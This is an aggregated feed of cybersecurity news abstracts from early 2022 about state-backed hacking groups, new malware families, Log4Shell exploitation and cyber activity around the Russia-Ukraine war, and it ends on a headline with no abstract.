Abstract
A researcher discovered critical flaws that can be exploited by remote attackers to hack a building controller popular in Russia. A researcher has identified critical vulnerabilities that can allegedly be exploited to remotely hack a building controller...Security Affairs
March 24, 2022
Anonymous targets western companies still active in Russia, including Auchan, Leroy Merlin and Decathlon
Abstract
Anonymous launches its offensive against Western companies still operating in Russia; it 'DDoSed' the Auchan, Leroy Merlin and Decathlon websites. Since the start of the Russian invasion of Ukraine on February 24, Anonymous has declared war on Russia and...Security Affairs
March 24, 2022
North Korean hackers exploit Chrome zero-day weeks before patch
Abstract
North Korean state hackers have exploited a zero-day, remote code execution vulnerability in Google Chrome web browser for more than a month before a patch became available, in attacks targeting news media, IT companies, cryptocurrency and fintech organizations.BleepingComputer
March 23, 2022
Chinese 'Mustang Panda' Hackers Spotted Deploying New 'Hodur' Malware
Abstract
A China-based advanced persistent threat (APT) known as Mustang Panda has been linked to an ongoing cyberespionage campaign using a previously undocumented variant of the PlugX remote access trojan on infected machines. Slovak cybersecurity firm ESET dubbed the new version Hodur, owing to its resemblance to another PlugX (aka Korplug) variant called THOR that came to light in July 2021. "Most victims are located in East and Southeast Asia, but a few are in Europe (Greece, Cyprus, Russia) and Africa (South Africa, South Sudan)," ESET malware researcher Alexandre Côté Cyr said in a report shared with The Hacker News. "Known victims include research entities, internet service providers (ISPs), and European diplomatic missions mostly located in East and Southeast Asia." Mustang Panda, also known as TA416, HoneyMyte, RedDelta, or PKPLUG, is a cyber espionage group that's primarily known for targeting non-governmental organizations with a specific focu... The Hacker News
March 23, 2022
Hackers steal from hackers by pushing fake malware on forums
Abstract
Security analysts from two companies have spotted a new case of hackers targeting hackers via clipboard stealers disguised as cracked RATs and malware building tools.BleepingComputer
March 23, 2022
Chinese Mustang Panda Hacker Group Spotted Deploying New Hodur Malware
Abstract
ESET researchers have discovered Hodur, a previously undocumented Korplug variant spread by Mustang Panda, that uses phishing lures referencing current events in Europe, including the invasion of Ukraine.ESET Security
March 21, 2022
Caketap Rootkit by UNC2891 Targets Banks' Customers
Abstract
The LightBasin threat actor is using the new Unix rootkit Caketap against servers running Oracle Solaris. Caketap can hide network files, processes, and connections, and install hooks into system functions for remote commands and configurations. The group has mostly targeted Oracle Solaris-bas... Cyware Alerts - Hacker News
March 21, 2022
South Korean DarkHotel Hackers Targeted Luxury Hotels in Macau
Abstract
Luxury hotels in the Chinese special administrative region of Macau were the target of a malicious spear-phishing campaign from the second half of November 2021 through mid-January 2022. Cybersecurity firm Trellix attributed the campaign with moderate confidence to a suspected South Korean advanced persistent threat (APT) tracked as DarkHotel, building on research previously published by Zscaler in December 2021. Believed to be active since 2007, DarkHotel has a history of striking "senior business executives by uploading malicious code to their computers through infiltrated hotel Wi-Fi networks, as well as through spear-phishing and P2P attacks," Zscaler researchers Sahil Antil and Sudeep Singh said. Prominent sectors targeted include law enforcement, pharmaceuticals, and automotive manufacturers. The attack chains involved distributing email messages directed to individuals in executive roles in the hotel, such as the vice president of human resources, assistan... The Hacker News
March 19, 2022
Cyber Attackers Tap Cloud Native Technologies in Russia-Ukraine War
Abstract
Researchers at Aqua revealed trends by analyzing data from public repositories that contain code and tools used for the cyber-aggression on both sides of the Russia-Ukraine conflict.Security Boulevard
March 18, 2022
Caketap, a new Unix rootkit used to siphon ATM banking data
Abstract
Mandiant researchers discovered a new Unix rootkit named Caketap, which is used to steal ATM banking data while investigating the activity of the LightBasin cybercrime group (aka UNC1945).Security Affairs
March 17, 2022
New Unix rootkit used to steal ATM banking data
Abstract
Threat analysts following the activity of LightBasin, a financially motivated group of hackers, report the discovery of a previously unknown Unix rootkit that is used to steal ATM banking data and conduct fraudulent transactions.BleepingComputer
March 17, 2022
Anonymous continues to support Ukraine against Russia
Abstract
The collective Anonymous and its affiliated groups continue to target the Russian government and private organizations. The collective Anonymous, and other groups in its ecosystem, continue to target the Russian government and private organizations. Let's...Security Affairs
March 17, 2022
BIG sabotage: Famous npm package deletes files to protest Ukraine war
Abstract
This week, the developer of the popular npm package 'node-ipc' released sabotaged versions of the library in protest of the ongoing Russo-Ukrainian War. The 'node-ipc' package, which gets downloaded over a million times weekly, began deleting files on developers' machines, in addition to creating new text files with "peace" messages.BleepingComputer
March 15, 2022
HackerOne apologizes to Ukrainian hackers for mistakenly blocking payouts
Abstract
Today, Chris Evans, the CISO of bug bounty platform HackerOne, apologized to Ukrainian hackers after erroneously blocking their bug bounty payouts following sanctions imposed on Russia and Belarus after the invasion of Ukraine.BleepingComputer
March 10, 2022
Ukrainian Hacker Linked to REvil Ransomware Attacks Extradited to United States
Abstract
Yaroslav Vasinskyi, a Ukrainian national linked to the Russia-based REvil ransomware group, has been extradited to the U.S. to face charges for his role in carrying out the file-encrypting malware attacks against several companies, including Kaseya last July. The 22-year-old had been previously arrested in Poland in October 2021, prompting the U.S. Justice Department (DoJ) to file charges of conspiracy to commit fraud and related activity in connection with computers, damage to protected computers, and conspiracy to commit money laundering. Ransomware is the digital equivalent of extortion wherein cybercrime actors encrypt victims' data and take it hostage in return for a monetary payment to recover the data, failing which the stolen information is published online or sold to other third parties. According to the DoJ, in addition to the headline-grabbing attacks on JBS and Kaseya, REvil is said to have propagated its infection to more than 175,000 computers, netting the... The Hacker News
March 09, 2022
Hackers fork open-source reverse tunneling tool for persistence
Abstract
Security experts have spotted an interesting case of a suspected ransomware attack that employed custom-made tools typically used by APT (advanced persistent threat) groups.BleepingComputer
March 08, 2022
Google: Russia, China, Belarus state hackers target Ukraine, Europe
Abstract
Google says Russian, Belarusian, and Chinese threat actors targeted Ukrainian and European government and military organizations, as well as individuals, in sweeping phishing campaigns and DDoS attacks.BleepingComputer
March 2, 2022
MuddyWater Rounds up its Arsenal with Multi-Malware Sets
Abstract
Cybersecurity agencies released a joint cybersecurity advisory detailing malicious cyber operations by MuddyWater, which has been targeting a wide range of government and private-sector organizations in Asia, Africa, Europe, and North America. Among others, CISA recommends that organizations use... Cyware Alerts - Hacker News
March 2, 2022
Iranian Hackers Introduce New Malware to Target Middle East
Abstract
Mandiant tracked cybercriminals collaborating under the moniker UNC3313 deploying two new targeted malware to claim victims in the Middle East. The group moves quickly to gain remote access by using ScreenConnect to intrude into systems within an hour of initial compromise. Furthermore, the security fir... Cyware Alerts - Hacker News
February 28, 2022
Meta: Ukrainian officials, military targeted by Ghostwriter hackers
Abstract
Facebook (now known as Meta) says it took down accounts used by a Belarusian-linked hacking group (UNC1151 or Ghostwriter) to target Ukrainian officials and military personnel on its platform.BleepingComputer
February 25, 2022
Multiple Hacking Groups Targeting ICS/OT Systems
Abstract
A new report on industrial cybersecurity has revealed three new threat groups, besides LockBit 2.0 and Conti, that have been targeting the industrial sector. Experts spotted three new groups, Petrovite, Kostovite, and Erythrite, that have been targeting ICS/OT systems. To protect from threats, ... Cyware Alerts - Hacker News
February 24, 2022
US and UK link new Cyclops Blink malware to Russian state hackers
Abstract
UK and US cybersecurity agencies linked Cyclops Blink malware to Russia's Sandworm APT. US and UK cybersecurity and law enforcement agencies published a joint security advisory about a new malware, dubbed Cyclops Blink, that has been linked to the Russian-backed...Security Affairs
February 23, 2022
US, UK link new Cyclops Blink malware to Russian state hackers
Abstract
New malware dubbed Cyclops Blink has been linked to the Russian-backed Sandworm hacking group in a joint security advisory published today by US and UK cybersecurity and law enforcement agencies.BleepingComputer
February 21, 2022
Hackers Exploiting Infected Android Devices to Register Disposable Accounts
Abstract
An analysis of SMS phone-verified account (PVA) services has led to the discovery of a rogue platform built atop a botnet involving thousands of infected Android phones, once again underscoring the flaws with relying on SMS for account validation. SMS PVA services, since gaining prevalence in 2018, provide users with alternative mobile numbers that can be used to register for other online services and platforms, and help bypass SMS-based authentication and single sign-on (SSO) mechanisms put in place to verify new accounts. "This type of service can be used by malicious actors to register disposable accounts in bulk or create phone-verified accounts for conducting fraud and other criminal activities," Trend Micro researchers said in a report published last week. Telemetry data gathered by the company shows that most of the infections are located in Indonesia (47,357), followed by Russia (16,157), Thailand (11,196), India (8,109), France (5,548), Peru (4,915), Moroc... The Hacker News
February 20, 2022
ShadowPad Linked to Chinese MSS and PLA
Abstract
Hackers affiliated with the Chinese Ministry of State Security and the People's Liberation Army are increasingly deploying the ShadowPad advanced modular RAT against their targets. It can steal sensitive system information, interact with the file system and registry, and deploy new modules to propaga... Cyware Alerts - Hacker News
February 17, 2022
TA2541: A Tale of New Mysterious Hackers
Abstract
Proofpoint discovered a new threat group, dubbed TA2541, targeting entities in the aviation, aerospace, transportation, defense, and manufacturing sectors since at least 2017. The most frequently delivered RATs in TA2541 campaigns include AsyncRAT, followed by Parallax, NetWire, and WSH RAT. The campaigns are... Cyware Alerts - Hacker News
February 15, 2022
Unskilled hacker linked to years of attacks on aviation, transport sectors
Abstract
For years, a low-skilled attacker has been using off-the-shelf malware in malicious campaigns aimed at companies in the aviation sector as well as in other sensitive industries.BleepingComputer
February 15, 2022
Mysterious Hackers Targeting Aerospace and Defence Industries for Years
Abstract
Dubbed TA2541 and detailed by researchers at Proofpoint, the persistent hacker group has been active since 2017 and has compromised hundreds of firms across North America, Europe, and the Middle East.ZDNet
February 10, 2022
Hacking group 'ModifiedElephant' evaded discovery for a decade
Abstract
Threat analysts have linked a decade of activity to an APT (advanced persistent threat) actor called 'ModifiedElephant', who has managed to remain elusive to all threat intelligence firms since 2012.BleepingComputer
February 10, 2022
Charming Kitten Adds New Malware To Its Arsenal
Abstract
Charming Kitten, aka Phosphorous, has reportedly added a novel PowerShell-based implant called PowerLess Backdoor which fortifies the group's ability to bypass security products. The attacker's toolset comes with extremely modular, multi-staged malware that decrypts and deploys additional payloads. ... Cyware Alerts - Hacker News
February 08, 2022
Kimsuky hackers use commodity RATs with custom Gold Dragon malware
Abstract
South Korean researchers have spotted a new wave of activity from the Kimsuky hacking group, involving commodity open-source remote access tools dropped with their custom backdoor, Gold Dragon.BleepingComputer
February 04, 2022
Another Israeli Firm, QuaDream, Caught Weaponizing iPhone Bug for Spyware
Abstract
A now-patched security vulnerability in Apple iOS that was previously found to be exploited by Israeli company NSO Group was also separately weaponized by a different surveillance vendor named QuaDream to hack into the company's devices. The development was reported by Reuters, citing unnamed sources, noting that "the two rival businesses gained the same ability last year to remotely break into iPhones [and] compromise Apple phones without an owner needing to open a malicious link." The zero-click exploit in question is FORCEDENTRY, a flaw in iMessage that could be leveraged to circumvent iOS security protections and install spyware that allowed attackers to scoop up a wealth of information such as contacts, emails, files, messages, and photos, as well as access to the phone's camera and microphone. QuaDream's spyware, named REIGN, functions in a manner similar to NSO Group's Pegasus, granting its users full control of the device. Apple addressed... The Hacker News
February 04, 2022
Microsoft: Russian FSB hackers hitting Ukraine since October
Abstract
Microsoft said today that a Russian hacking group known as Gamaredon has been behind a streak of spear-phishing emails targeting Ukrainian entities and organizations related to Ukrainian affairs since October 2021.BleepingComputer
February 04, 2022
Russian Gamaredon Hackers Targeted 'Western Government Entity' in Ukraine
Abstract
The Russia-linked Gamaredon hacking group attempted to compromise an unnamed Western government entity operating in Ukraine last month amidst ongoing geopolitical tensions between the two countries. Palo Alto Networks' Unit 42 threat intelligence team, in a new report publicized on February 3, said that the phishing attack took place on January 19, adding it "mapped out three large clusters of their infrastructure used to support different phishing and malware purposes." The threat actor, also known as Shuckworm, Armageddon, or Primitive Bear, has historically focused its offensive cyber attacks against Ukrainian government officials and organizations since 2013. Last year, Ukraine disclosed the collective's ties to Russia's Federal Security Service (FSB). To carry out the phishing attack, the operators behind the campaign leveraged a job search and employment platform within the country as a conduit to upload their malware downloader in the form of a res... The Hacker News
February 3, 2022
Exclusive interview with the Powerful Greek Army (PGA) hacker group
Abstract
Six years ago the Powerful Greek Army (PGA) appeared in the threat landscape. After a long breach the hacker collective is back. I have interviewed them in exclusive ... enjoy it! Tell me about your hacker team, which is the motivation behind the attacks? We...Security Affairs
February 01, 2022
Hacker Group 'Moses Staff' Using New StrifeWater RAT in Ransomware Attacks
Abstract
A politically motivated hacker group tied to a series of espionage and sabotage attacks on Israeli entities in 2021 incorporated a previously undocumented remote access trojan (RAT) that masquerades as the Windows Calculator app as part of a conscious effort to stay under the radar. Cybersecurity company Cybereason, which has been tracking the operations of the Iranian actor known as Moses Staff, dubbed the malware "StrifeWater." "The StrifeWater RAT appears to be used in the initial stage of the attack and this stealthy RAT has the ability to remove itself from the system to cover the Iranian group's tracks," Tom Fakterman, Cybereason security analyst, said in a report. "The RAT possesses other capabilities, such as command execution and screen capturing, as well as the ability to download additional extensions." Moses Staff came to light towards the end of last year when Check Point Research unmasked a series of attacks aimed at Israeli or... The Hacker News
February 01, 2022
Iranian Hackers Using New PowerShell Backdoor in Cyber Espionage Attacks
Abstract
An advanced persistent threat group with links to Iran has updated its malware toolset to include a novel PowerShell-based implant called PowerLess Backdoor, according to new research published by Cybereason. The Boston-headquartered cybersecurity company attributed the malware to a hacking group known as Charming Kitten (aka Phosphorous, APT35, or TA453), while also calling out the backdoor's evasive PowerShell execution. "The PowerShell code runs in the context of a .NET application, thus not launching 'powershell.exe' which enables it to evade security products," Daniel Frank, senior malware researcher at Cybereason, said. "The toolset analyzed includes extremely modular, multi-staged malware that decrypts and deploys additional payloads in several stages for the sake of both stealth and efficacy." The threat actor, which has been active since at least 2017, has been behind a series of campaigns in recent years, including those wherein the adversa... The Hacker News
January 31, 2022
Expert earned $100,500 bounty to hack Apple MacBook webcam and microphone
Abstract
Apple paid a $100K+ bounty for a series of macOS flaws that can allow threat actors to take over the microphone and camera. Apple last year addressed multiple macOS vulnerabilities discovered by the security researcher Ryan Pickren in the Safari browser... (Security Affairs)
January 30, 2022
Researchers use GPU fingerprinting to track users online
Abstract
A team of researchers from French, Israeli, and Australian universities has explored the possibility of using people's GPUs to create unique fingerprints and use them for persistent web tracking. (BleepingComputer)
January 28, 2022
North Korean Hackers Using Windows Update Service to Infect PCs with Malware
Abstract
The notorious Lazarus Group actor has been observed mounting a new campaign that makes use of the Windows Update service to execute its malicious payload, expanding the arsenal of living-off-the-land (LotL) techniques leveraged by the APT group to further its objectives. The Lazarus Group, also known as APT38, Hidden Cobra, Whois Hacking Team, and Zinc, is the moniker assigned to the North Korea-based nation-state hacking group that's been active since at least 2009. Last year, the threat actor was linked to an elaborate social engineering campaign targeting security researchers. The latest spear-phishing attacks, which Malwarebytes detected on January 18, originate from weaponized documents with job-themed lures impersonating the American global security and aerospace company Lockheed Martin. Opening the decoy Microsoft Word file triggers the execution of a malicious macro embedded within the document that, in turn, executes a Base64-decoded shellcode to inject a nu... (The Hacker News)
January 28, 2022
North Korean Hackers Return with Stealthier Variant of KONNI RAT Malware
Abstract
A cyberespionage group with ties to North Korea has resurfaced with a stealthier variant of its remote access trojan called Konni to attack political institutions located in Russia and South Korea. "The authors are constantly making code improvements," Malwarebytes researcher Roberto Santos said. "Their efforts are aimed at breaking the typical flow recorded by sandboxes and making detection harder, especially via regular signatures as critical parts of the executable are now encrypted." Most recent intrusions staged by the group, believed to be operating under the Kimsuky umbrella, involved targeting the Russian Federation's Ministry of Foreign Affairs (MID) with New Year lures to compromise Windows systems with malware. The infections, as with other attacks of this kind, start with a malicious Microsoft Office document that, when opened, initiates a multi-stage process that involves several moving parts that help the attackers elevate privileges, eva... (The Hacker News)
January 28, 2022
Hackers are taking over CEO accounts with rogue OAuth apps
Abstract
Threat analysts have observed a new campaign named 'OiVaVoii', targeting company executives and general managers with malicious OAuth apps and custom phishing lures sent from hijacked Office 365 accounts. (BleepingComputer)
January 27, 2022
Lazarus hackers use Windows Update to deploy malware
Abstract
North Korean-backed hacking group Lazarus has added the Windows Update client to its list of living-off-the-land binaries (LoLBins) and is now actively using it to execute malicious code on Windows systems. (BleepingComputer)
January 26, 2022
Hackers Using New Evasive Technique to Deliver AsyncRAT Malware
Abstract
A new, sophisticated phishing attack has been observed delivering the AsyncRAT trojan as part of a malware campaign that's believed to have commenced in September 2021. "Through a simple email phishing tactic with an html attachment, threat attackers are delivering AsyncRAT (a remote access trojan) designed to remotely monitor and control its infected computers through a secure, encrypted connection," Michael Dereviashkin, security researcher at enterprise breach prevention firm Morphisec, said in a report. The intrusions commence with an email message containing an HTML attachment that's disguised as an order confirmation receipt (e.g., Receipt-... (The Hacker News)
January 24, 2022
Hackers Creating Fraudulent Crypto Tokens as Part of ‘Rug Pull’ Scams
Abstract
Misconfigurations in smart contracts are being exploited by scammers to create malicious cryptocurrency tokens with the goal of stealing funds from unsuspecting users. The instances of token fraud in the wild include hiding 99% fee functions and concealing backdoor routines, researchers from Check Point said in a report shared with The Hacker News. Smart contracts are programs stored on the blockchain that are automatically executed when predetermined conditions are met according to the terms of a contract or an agreement. They allow trusted transactions and agreements to be carried out between anonymous parties without the need for a central authority. By examining the Solidity source code used for implementing smart contracts, the Israeli cybersecurity company found instances of hidden and hardcoded fees that can't be changed, while allowing malicious actors to exert control over "who is allowed to sell." In another instance, a legitimate contract called... (The Hacker News)
January 23, 2022
Molerats cyberespionage group uses public cloud services as attack infrastructure
Abstract
Cyberespionage group Molerats has been observed abusing legitimate cloud services, like Google Drive and Dropbox, as attack infrastructure. Zscaler ThreatLabz analyzed an active espionage campaign carried out by the Molerats cyberespionage group (aka TA402,... (Security Affairs)
January 22, 2022
Molerats Hackers Hiding New Espionage Attacks Behind Public Cloud Infrastructure
Abstract
An active espionage campaign has been attributed to the threat actor known as Molerats that abuses legitimate cloud services like Google Drive and Dropbox to host malware payloads and for command-and-control and the exfiltration of data from targets across the Middle East. The cyber offensive is believed to have been underway since at least July 2021, according to cloud-based information security company Zscaler, continuing previous efforts by the hacking group to conduct reconnaissance on the target hosts and plunder sensitive information. Molerats, also tracked as TA402, Gaza Hackers Team, and Extreme Jackal, is an advanced persistent threat (APT) group that's largely focused on entities operating in the Middle East. Attack activity associated with the actor has leveraged geopolitical and military themes to entice users to open Microsoft Office attachments and click on malicious links. The latest campaign detailed by Zscaler is no different in that it makes use of deco... (The Hacker News)
January 21, 2022
Chinese Hackers Spotted Using New UEFI Firmware Implant in Targeted Attacks
Abstract
A previously undocumented firmware implant deployed to maintain stealthy persistence as part of a targeted espionage campaign has been linked to the Chinese-speaking Winnti advanced persistent threat group (APT41). Kaspersky, which codenamed the rootkit MoonBounce, characterized the malware as the "most advanced UEFI firmware implant discovered in the wild to date," adding "the purpose of the implant is to facilitate the deployment of user-mode malware that stages execution of further payloads downloaded from the internet." Firmware-based rootkits, once a rarity in the threat landscape, are fast becoming lucrative tools among sophisticated actors to help achieve a long-standing foothold in a manner that's not only hard to detect, but also difficult to remove. The first firmware-level rootkit — dubbed LoJax — was discovered in the wild in 2018. Since then, three different instances of UEFI malware have been unearthed so far, including MosaicRegresso... (The Hacker News)
January 20, 2022
Attackers Exploit Corporate Infrastructure for Credentials on ICS Networks
Abstract
While the ever-evolving technological landscape has connected the IT and OT sides of the business, it has also left ICS networks exposed to threats impacting IT systems. (Cyware Alerts - Hacker News)
January 19, 2022
DoNot Hacking Team Targeting Government and Military Entities in South Asia
Abstract
A threat actor with potential links to an Indian cybersecurity company has been nothing if not remarkably persistent in its attacks against military organizations based in South Asia, including Bangladesh, Nepal, and Sri Lanka, since at least September 2020 by deploying different variants of its bespoke malware framework. Slovak cybersecurity firm ESET attributed the highly targeted attack to a hacking group known as Donot Team. "Donot Team has been consistently targeting the same entities with waves of spear-phishing emails with malicious attachments every two to four months," researchers Facundo Muñoz and Matías Porolli said. Operating since at least 2016, Donot Team (also known as APT-C-35 and SectorE02) has been linked to a string of intrusions primarily targeting embassies, governments, and military entities in Bangladesh, Sri Lanka, Pakistan, and Nepal with Windows and Android malware. In October 2021, Amnesty International unearthed evidence tying the group'... (The Hacker News)
January 19, 2022
Microsoft: Hackers Exploiting New SolarWinds Serv-U Bug Related to Log4j Attacks
Abstract
Microsoft on Wednesday disclosed details of a new security vulnerability in SolarWinds Serv-U software that it said was being weaponized by threat actors to propagate attacks leveraging the Log4j flaws to compromise targets. Tracked as CVE-2021-35247 (CVSS score: 5.3), the issue is an "input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation," Microsoft Threat Intelligence Center (MSTIC) said. The flaw, which was discovered by security researcher Jonathan Bar Or, affects Serv-U versions 15.2.5 and prior, and has been addressed in Serv-U version 15.3. "The Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized," SolarWinds said in an advisory, adding it "updated the input mechanism to perform additional validation and sanitization." The IT management software maker also pointed out that "no downstre... (The Hacker News)
January 19, 2022
Russian Hackers Heavily Using Malicious Traffic Direction System to Distribute Malware
Abstract
Potential connections between a subscription-based crimeware-as-a-service (CaaS) solution and a cracked copy of Cobalt Strike have been established in what the researchers suspect is being offered as a tool for its customers to stage post-exploitation activities. Prometheus, as the service is called, first came to light in August 2021 when cybersecurity company Group-IB disclosed details of malicious software distribution campaigns undertaken by cybercriminal groups to distribute Campo Loader, Hancitor, IcedID, QBot, Buer Loader, and SocGholish in Belgium and the U.S. Costing $250 a month, it's marketed on Russian underground forums as a traffic direction system (TDS) to enable phishing redirection on a mass scale to rogue landing pages that are designed to deploy malware payloads on the targeted systems. "Prometheus can be considered a full-bodied service/platform that allows threat groups to purvey their malware or phishing operations with ease," BlackBerry Resear... (The Hacker News)
January 19, 2022
FIN8 Hackers Spotted Using New ‘White Rabbit’ Ransomware in Recent Attacks
Abstract
The financially motivated FIN8 actor, in all likelihood, has resurfaced with a never-before-seen ransomware strain called "White Rabbit" that was recently deployed against a local bank in the U.S. in December 2021. That's according to new findings published by Trend Micro, calling out the malware's overlaps with Egregor, which was taken down by Ukrainian law enforcement authorities in February 2021. "One of the most notable aspects of White Rabbit's attack is how its payload binary requires a specific command-line password to decrypt its internal configuration and proceed with its ransomware routine," the researchers noted. "This method of hiding malicious activity is a trick that the ransomware family Egregor uses to hide malware techniques from analysis." Egregor, which commenced operations in September 2020 until its operations took a huge hit, is widely believed to be a reincarnation of Maze, which shut down its criminal enterp... (The Hacker News)
January 18, 2022
Financially motivated Earth Lusca threat actor targets organizations worldwide
Abstract
A sophisticated threat actor, tracked as Earth Lusca, is targeting government and private organizations worldwide for financial purposes. Trend Micro researchers spotted an elusive threat actor, called Earth Lusca, that targets organizations worldwide... (Security Affairs)
January 18, 2022
USCYBERCOM Links MuddyWater to Iranian Intelligence Agency
Abstract
MuddyWater, aka Seedworm, is an Iranian cyberespionage threat actor that primarily targets the UAE, Saudi Arabia, Israel, Iraq, and other Middle Eastern nations, as well as some European and North American countries. (Cyware Alerts - Hacker News)
January 18, 2022
Earth Lusca Hackers Aimed at High-Value Targets in Government and Private Sectors
Abstract
An elusive threat actor called Earth Lusca has been observed striking organizations across the world as part of what appears to be simultaneously an espionage campaign and an attempt to reap monetary profits. "The list of its victims includes high-value targets such as government and educational institutions, religious movements, pro-democracy and human rights organizations in Hong Kong, COVID-19 research organizations, and the media, amongst others," Trend Micro researchers said in a new report. "However, the threat actor also seems to be financially motivated, as it also took aim at gambling and cryptocurrency companies." The cybersecurity firm attributed the group as part of the larger China-based Winnti cluster, which refers to a number of linked groups rather than a single discrete entity that are focused on intelligence gathering and intellectual property theft. Earth Lusca's intrusion routes are facilitated by spear-phishing and watering hole attacks... (The Hacker News)
January 17, 2022
Earth Lusca Employs Doraemon, ShadowPad and Winnti Malware to Target Organizations in Hong Kong
Abstract
The group’s primary motivation seems to be cyberespionage: the list of its victims includes high value targets in Hong Kong, COVID-19 research organizations, and the media, among others. (Trend Micro)
January 14, 2022
FIN7 Targeting U.S. Businesses with BadUSB Devices
Abstract
The FBI is alerting U.S. organizations about the rise in BadUSB attacks, by the FIN7 threat actor group, that deliver ransomware to unsuspecting organizations. Plugging the USB drives into computers registers the drive as a keyboard and sends a series of automated pre-configured keystrokes. T... (Cyware Alerts - Hacker News)
January 13, 2022
GootLoader Hackers Targeting Employees of Law and Accounting Firms
Abstract
Operators of the GootLoader campaign are setting their sights on employees of accounting and law firms as part of a fresh onslaught of widespread cyberattacks to deploy malware on infected systems, an indication that the adversary is expanding its focus to other high-value targets. "GootLoader is a stealthy initial access malware, which after getting a foothold into the victim's computer system, infects the system with ransomware or other lethal malware," researchers from eSentire said in a report shared with The Hacker News. The cybersecurity services provider said it intercepted and dismantled intrusions aimed at three law firms and an accounting enterprise. The names of the victims were not disclosed. Malware can be delivered on targets' systems via many methods, including poisoned search results, fake updates, and trojanized applications downloaded from sites linking to pirated software. GootLoader resorts to the first technique. In March 2021, details em... (The Hacker News)
January 13, 2022
Researchers Decrypted Qakbot Banking Trojan’s Encrypted Registry Keys
Abstract
Cybersecurity researchers have decoded the mechanism by which the versatile Qakbot banking trojan handles the insertion of encrypted configuration data into the Windows Registry. Qakbot, also known as QBot, QuackBot and Pinkslipbot, has been observed in the wild since 2007. Although mainly fashioned as an information-stealing malware, Qakbot has since shifted its goals and acquired new functionality to deliver post-compromise attack platforms such as Cobalt Strike Beacon, with the final objective of loading ransomware on infected machines. "It has been continually developed, with new capabilities introduced such as lateral movement, the ability to exfiltrate email and browser data, and to install additional malware," Trustwave researchers Lloyd Macrohon and Rodel Mendrez said in a report shared with The Hacker News. In recent months, phishing campaigns have culminated in the distribution of a new loader called SQUIRRELWAFFLE, which acts as a channel to retrieve... (The Hacker News)
January 13, 2022
Iranian Hackers Exploit Log4j Vulnerability to Deploy PowerShell Backdoor
Abstract
An Iranian state-sponsored actor has been observed scanning and attempting to abuse the Log4Shell flaw in publicly-exposed Java applications to deploy a hitherto undocumented PowerShell-based modular backdoor dubbed "CharmPower" for follow-on post-exploitation. "The actor's attack setup was obviously rushed, as they used the basic open-source tool for the exploitation and based their operations on previous infrastructure, which made the attack easier to detect and attribute," researchers from Check Point said in a report published this week. The Israeli cybersecurity company linked the attack to a group known as APT35, which is also tracked using the codenames Charming Kitten, Phosphorus, and TA453, citing overlaps with toolsets previously identified as infrastructure used by the threat actor. Log4Shell aka CVE-2021-44228 (CVSS score: 10.0) concerns a critical security vulnerability in the popular Log4j logging library that, if successfully exploite... (The Hacker News)
January 12, 2022
Hackers Use Cloud Services to Distribute Nanocore, Netwire, and AsyncRAT Malware
Abstract
Threat actors are actively incorporating public cloud services from Amazon and Microsoft into their malicious campaigns to deliver commodity remote access trojans (RATs) such as Nanocore, Netwire, and AsyncRAT to siphon sensitive information from compromised systems. The spear-phishing attacks, which commenced in October 2021, have primarily targeted entities located in the U.S., Canada, Italy, and Singapore, researchers from Cisco Talos said in a report shared with The Hacker News. Using existing infrastructure to facilitate intrusions is increasingly becoming part of an attacker's playbook as it obviates the need to host their own servers, not to mention using it as a cloaking mechanism to evade detection by security solutions. In recent months, collaboration and communication tools like Discord, Slack, and Telegram have found a place in many an infection chain to commandeer and exfiltrate data from the victim machines. Viewed in that light, the abuse of cloud pla... (The Hacker News)
January 12, 2022
US links MuddyWater hacking group to Iranian intelligence agency
Abstract
US Cyber Command (USCYBERCOM) has officially linked the Iranian-backed MuddyWater hacking group to Iran's Ministry of Intelligence and Security (MOIS). (BleepingComputer)
January 12, 2022
Russia-linked threat actors target critical infrastructure, US authorities warn
Abstract
US authorities warn critical infrastructure operators of the threat of cyberattacks orchestrated by Russia-linked threat actors. The US Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National... (Security Affairs)
January 12, 2022
OceanLotus hackers turn to web archive files to deploy backdoors
Abstract
The OceanLotus group of state-sponsored hackers is now using the web archive file format (.MHT and .MHTML) to deploy backdoors to compromised systems. (BleepingComputer)
January 11, 2022
State hackers use new PowerShell backdoor in Log4j attacks
Abstract
Hackers believed to be part of the Iranian APT35 state-backed group (aka 'Charming Kitten' or 'Phosphorus') have been observed leveraging Log4Shell attacks to drop a new PowerShell backdoor. (BleepingComputer)
January 10, 2022
Oops: Cyberspies infect themselves with their own malware
Abstract
After infecting themselves with their own custom remote access trojan (RAT), an Indian-linked cyber-espionage group has accidentally exposed its operations to security researchers. (BleepingComputer)
January 9, 2022
Microsoft and the FTC Say Attackers Still Not Done with Log4Shell
Abstract
Public and private organizations alike, including Microsoft and the U.S. Federal Trade Commission (FTC), are alerting organizations against continuous attacks exploiting Log4Shell since December 2021. (Cyware Alerts - Hacker News)
January 7, 2022
Aquatic Panda Targets Academic Institutions via Log4Shell
Abstract
CrowdStrike researchers have found Aquatic Panda threat actors who are abusing Log4Shell exploit tools on a vulnerable VMware installation at large academic institutions. The threat group is known for using tools for maintaining persistence to obtain access to intellectual property and other trade... (Cyware Alerts - Hacker News)
January 7, 2022
FIN7 group continues to target US companies with BadUSB devices
Abstract
The Federal Bureau of Investigation (FBI) warns US companies that the FIN7 cybercriminal group is targeting the US defense industry with BadUSB devices. The US Federal Bureau of Investigation issued a flash alert to warn that the financially motivated... (Security Affairs)
January 05, 2022
Researchers Uncover Hacker Group Behind Organized Financial-Theft Operation
Abstract
Cybersecurity researchers have taken the wraps off an organized financial-theft operation undertaken by a discreet actor to target transaction processing systems and siphon funds from entities primarily located in Latin America for at least four years. The malicious hacking group has been codenamed Elephant Beetle by Israeli incident response firm Sygnia, with the intrusions aimed at banks and retail companies by injecting fraudulent transactions among benign activity to slip under the radar after an extensive study of the targets' financial structures. "The attack is relentless in its ingenious simplicity serving as an ideal tactic to hide in plain sight, without any need to develop exploits," the researchers said in a report shared with The Hacker News, calling out the group's overlaps with another tracked by Mandiant as FIN13, an "industrious" threat actor linked to data theft and ransomware attacks in Mexico stretching back as early as 2016. Ele... (The Hacker News)
January 5, 2022
Threat actors continue to exploit Log4j flaws in their attacks, Microsoft Warns
Abstract
Threat actors continue to attempt to exploit Apache Log4j vulnerabilities in their campaigns to deploy malware on target systems, Microsoft warns. Microsoft is warning of continuing attempts by nation-state actors and cybercriminals to exploit recently... (Security Affairs)
January 04, 2022
Hackers use video player to steal credit cards from over 100 sites
Abstract
